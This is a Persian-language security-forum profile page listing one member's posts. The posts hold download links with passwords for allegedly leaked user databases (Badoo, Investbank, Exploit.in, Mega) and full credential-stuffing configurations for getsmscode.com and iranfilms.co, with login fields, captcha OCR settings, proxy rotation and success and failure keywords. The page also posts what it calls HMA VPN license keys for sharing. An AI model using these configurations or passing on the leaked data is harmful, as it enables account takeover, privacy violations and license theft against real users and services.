رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

AmirCreeD

New Member
 • تعداد ارسال ها

  8
 • تاریخ عضویت

 • آخرین بازدید

اعتبار در سایت

0 Neutral

درباره AmirCreeD

 • تاریخ تولد ۹۰/۰۹/۲۷

Converted

 • Name
  Amir
 • Main os
  Ubuntu
 • Programming language
  خیر
 1. AmirCreeD

  !!! Investbank Database

  http://uploadboy.me/8jktennj068c/investbank.ae.zip.html password: iran-cyber.net
 2. AmirCreeD

  Badoo.com Database

  http://uploadboy.me/jcuixfup8xc4/Badoo.com.rar.html password: iran-cyber.net !!! 2016
 3. AmirCreeD

  Getsmscode.com Config +full Capture+ocr +proxy

  [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 15C98EBF53FEDCD529E10B7E87DE3487=17 [settings] SiteURL=http://www.getsmscode.com/ Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 UsernameStart=6 UsernameEnd=8 PasswordStart=6 PasswordEnd=8 ComboMode=0 Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 EmailFilter=0 EmailMode=0 ProxyActivate=10 ProxyRatio=0 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowProxies=10 BanWindowRatio=10 blnNoProxies=0 RequestMethod=2 Referer=0 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| POSTData=username=<USER>&password=<PASS>&vcode=<Captcha>&submit=Sign+In [Form] IAParse=0 blnBasic=0 Action=http://www.getsmscode.com/login.php Username=username Password=password Email= CustomData= NoIndex= AddData=submit=Sign+In Cookie=__cfduid=de5bff37c8ab59ba7b73c09848d70ac581479394435 IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl=http://www.getsmscode.com/user.php RedPostData= LoginPostData= RedKeys=<Source>||Account Stats DataDesc=Balance CaptureParsingCode=e: <span style="color:#F00">|<|#00|#00|0|#00|#00|0 RefreshSession=0 RefreshCookie=1 IAMethod=2 POSTMethod=2 RedMethod=1 LoginMethod=1 AjaxHeader=0 FormHeader=0 RedHeader=0 LoginHeader=0 ImageAfterAjax=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=0 [Ajax] Variables= PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None RedURL= [OCR] OCRMode=2 URLMode=0 ImageURLID=/includes/code.php Captcha=vcode OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=1 blnInvert=0 blnNoise=1 blnIsolate=1 blnResize=1 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=1 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=1 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=-1 Brightness=0 Saturation=0 Threshold=-1 Noise=2 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=3 MaxLength=5 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=cp2 [Fake] AfterFP=0 FollowRedirect=1 EnableConHits=0 Success=3 ConHits=10 EnableConLength=0 SourceTags=1 ConLength=200 blnSuccess=0 SuccessRetries=3 blnForbToOK=1 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 blnCompleteNot=1 HTTPFollow=1 blnProcessErrors=1 blnInvalidPath=1 UserField=0 [Keywords] HeaderFail= HeaderSuccess= HeaderBan= HeaderRetry= SourceFail=The username or password is wrong!;Parameter error SourceSuccess=Account Stats SourceBan=Too Many try login,wait 30 mins to login again SourceRetry=<ORetry>||'Verfily Code is Null or Incorrect!' EnableHeaderFail=0 EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderRetry=0 EnableSourceFail=1 EnableSourceSuccess=1 EnableSourceBan=1 EnableSourceRetry=1 EnableGlobalSourceRetry=1
 4. AmirCreeD

  Iranfilms.co

  [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 18D4AFA80E48D931C184338FDDC17385=0 159BCA07E29C77E5A62E7DCA86503A02=219 AF4F5D0872ED5E577CA575CD0D6100D2=61 [settings] SiteURL=http://iranfilms.co/user/login/ Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 ComboMode=0 EmailFilter=0 EmailMode=0 UsernameStart=6 UsernameEnd=8 InvalidChars= AllowedChars= Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordStart=6 PasswordEnd=8 PasswordInvalidChars= PasswordAllowedChars= PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowRatio=10 BanWindowProxies=10 blnNoProxies=1 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: http://iranfilms.co/user/login/|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| RequestMethod=2 Referer=2 POSTData=log=<USER>&pwd=<PASS>&verifyCode=<Captcha>&captchaToken=0edc4bee70d9df613e3bce9c1d5bd8c2&redirect=%2Fuser%2Flogin%2F [Fake] AfterFP=0 blnSuccess=0 SuccessRetries=3 blnProcessErrors=1 blnCompleteNot=1 EnableConHits=0 ConHits=0 FollowRedirect=1 EnableConLength=0 ConLength=-1 SourceTags=0 UserField=0 HTTPFollow=1 blnForbToOK=1 ForbToOkLength=1000 blnBadOcrCode=1 BadOcrCodeRetries=6 [Keywords] EnableHeaderSuccess=1 EnableHeaderBan=0 EnableHeaderFail=0 EnableHeaderRetry=0 HeaderSuccess=302 Found HeaderBan= HeaderFail= HeaderRetry= EnableGlobalSourceRetry=0 EnableSourceSuccess=1 EnableSourceBan=0 EnableSourceFail=1 EnableSourceRetry=1 SourceSuccess=>پنل کاربری< SourceBan= SourceFail=آدرس ایمیل معتبر نیست.;شناسه وارد شده صحیح نیست.;رمز وارد شده برای ایمیل SourceRetry=<ORetry>||>کد امنیتی اشتباه است.< [Form] IAParse=0 LoginPostData= LoginMethod=1 LoginHeader=0 Action=http://iranfilms.co/user/login/ Username=log Password=pwd Email= AddData=captchaToken=0edc4bee70d9df613e3bce9c1d5bd8c2&redirect=%2Fuser%2Flogin%2F CustomData= NoIndex= Cookie= IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl= RedPostData= RedKeys= DataDesc=VIP CaptureParsingCode=n"> |<|#00|#00|0|#00|=>iran-cyber |0 RefreshSession=1 RefreshCookie=0 FormHeader=0 AjaxHeader=0 RedHeader=0 IAMethod=2 POSTMethod=2 RedMethod=1 ImageAfterAjax=0 blnBasic=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2= RedURL= [OCR] OCRMode=2 URLMode=0 ImageURLID=http://iranfilms.co/wp-content/themes/iranfilm_clean/captcha.php? Captcha=verifyCode OCRKey= RefreshCaptcha=1 blnContrast=0 blnBrightness=0 blnSaturation=1 blnThreshold=1 blnInvert=0 blnNoise=0 blnIsolate=1 blnResize=1 blnBorder=0 blnCharExtract=1 blnRemoveColors=0 blnStringFilter=1 blnLetter=0 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnCharTable=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnThreeImages=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=8 Threshold=132 Noise=1 Isolate=7 Resize=9 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=7 BlurRadius=1 CharExtractMaxWidth=29 CharWidthMinBlack=1 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=3 GifOffset=3 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=39 CharExclude= SpecialChars= Colors= Colors2=238-84-101-35 Lines=Min Length: 2, Max Width: 5, Horizzontal Language=cp16
 5. as above so below as within so without
 6. AmirCreeD

  !!! Exploit.in Database

  http://uploadboy.me/8ner4o50uoy4/exploit.in.zip.html Password: iran-cyber.net
 7. AmirCreeD

  !!! Mega.co.nz Database

  http://uploadboy.com/kuysekqkfiua/2615/7z PassWord: iran-cyber.net
 8. AmirCreeD

  Hma Licence Keys

  R83RRX-A8NMZ2-5FL5TN 95WZ8G-JAFR32-5FL5YW 2AN873-W64MT2-5FL5BN W5WYLM-9WJDZJ-5FL5JJ Q68G94-ULS9T2-4ZL4F2 B8UWWM-K24YW2-5FL5GN 8N39Q2-UR9LK2-5FL5Y2 N98EDM-GDLU82-5FL5DS NHG5PU-QH8UZ2-5FC5L6 662LSC-LLX5MJ-5FL5WN !!! Be Jaye Login az Licence ha Estefade knid

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
 • اضافه کردن...